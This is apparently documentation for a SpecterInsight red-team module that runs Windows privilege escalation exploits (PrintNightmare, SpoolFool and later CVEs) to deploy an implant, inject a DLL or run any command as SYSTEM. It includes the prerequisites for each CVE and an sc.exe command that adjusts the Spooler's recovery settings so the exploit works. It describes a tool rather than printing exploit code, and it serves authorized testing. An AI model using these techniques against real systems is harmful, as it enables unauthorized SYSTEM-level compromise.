Description
Runs a Windows privilege escalation technique by CVE or technique name and reports whether the vulnerability check passed and execution succeeded.
Overview
Invokes a validated Windows privilege escalation technique from the LevelUp library against the current session. Each technique first runs a Check() phase to confirm the target is vulnerable, then either deploys a SpecterInsight agent payload (Elevation parameter set) or executes an arbitrary command as SYSTEM (Command parameter set).
Only techniques that have passed end-to-end integration testing are listed.
Parameter Sets
Elevation (default)
Deploys the current SpecterInsight implant to the target system as SYSTEM. No -Command argument is needed. Optionally accepts -DllPath to inject a specific DLL directly via the technique escalation path instead of deploying the standard implant.
Command
Runs an arbitrary command as SYSTEM via the chosen technique’s escalation path. -Command is mandatory in this set.
Arguments
| Parameter | Type | Set | Mandatory | Description |
|---|---|---|---|---|
| Technique | string | Both | Yes | The validated privilege escalation technique to invoke. |
| BuildId | string | Elevation | No | Build ID of the SpecterInsight payload to deploy. Defaults to the current session build. |
| DllPath | string | Elevation | No | Path on the target to a DLL to inject directly via the technique escalation path. Defaults to a randomly generated path in C:\Users\Public. Supported by CVE-2021-34527, CVE-2022-21999, CVE-2023-21746, CVE-2024-21447. |
| Command | string | Command | Yes | Arbitrary command to execute as SYSTEM. |
Validated Techniques
| CVE | Technique |
|---|---|
| CVE-2021-34527 | PrintNightmare – Windows Print Spooler DLL load via AddPrinterDriverEx |
| CVE-2022-21999 | SpoolFool – Print Spooler SpoolDirectory junction swap |
| CVE-2024-21447 | Windows User Manager AccountPicture EoP via junction chain |
| CVE-2024-26169 | Windows Error Reporting Service EoP via WER queue junction swap |
| CVE-2024-49039 | Windows Task Scheduler WPTaskScheduler NCALRPC sandbox escape |
Per-Technique Pre-Requisites
| CVE | Additional Requirement |
|---|---|
| CVE-2021-34527 | Print Spooler must be running. Pre-July 2021 patch (KB5004945/KB5004946/KB5004948 absent). Staging path must be writable. |
| CVE-2022-21999 | Print Spooler must be running with a fast failure recovery policy (restart delay <30 s for the first two actions). The exploit crashes spoolsv.exe twice; the 30-second restart wait times out against the default 60-second Windows policy. Configure with: sc.exe failure Spooler reset= 0 actions= restart/3000/restart/3000/restart/3000 |
| CVE-2024-21447 | Windows activation required (UserManager SetAccountPicture returns ChangeDisabled on unactivated targets). |
| CVE-2024-26169 | Windows Error Reporting Service (WerSvc) must be running. |
| CVE-2024-49039 | Technique works from any integrity level; elevated session will not call back unless launched from an AppContainer context. |
Dependencies
- levelup
Operating Systems
- Windows
Example Output
Name Value
---- -----
Technique CVE-2024-26169
CheckPassed True
ExecuteSucceeded True
{
"Technique": "CVE-2024-26169",
"CheckPassed": true,
"ExecuteSucceeded": true
}